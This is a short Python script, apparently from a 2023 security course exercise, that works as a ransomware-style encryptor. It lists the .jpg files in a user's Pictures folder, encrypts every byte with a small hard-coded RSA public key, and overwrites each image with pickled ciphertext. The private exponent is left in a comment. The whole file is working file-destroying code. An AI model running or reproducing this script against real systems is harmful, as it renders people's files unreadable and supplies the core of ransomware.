#!/usr/bin/env python3
import os
import pickle

folder_name = "/home/csc2023/Pictures"

public_key_n = 22291846172619859445381409012451
public_key_e = 65535
# public_key_d = 14499309299673345844676003563183

folder = [p for p in os.listdir(folder_name) if p[-4:] == ".jpg"]

for picture in folder:
    plain_bytes = b''
    with open(f'{folder_name}/{picture}', 'rb') as f:
        plain_bytes = f.read()
    cipher_bytes = [pow(i, public_key_e, public_key_n) for i in plain_bytes]
    with open(f'{folder_name}/{picture}', 'wb') as f:
        pickle.dump(cipher_bytes, f)
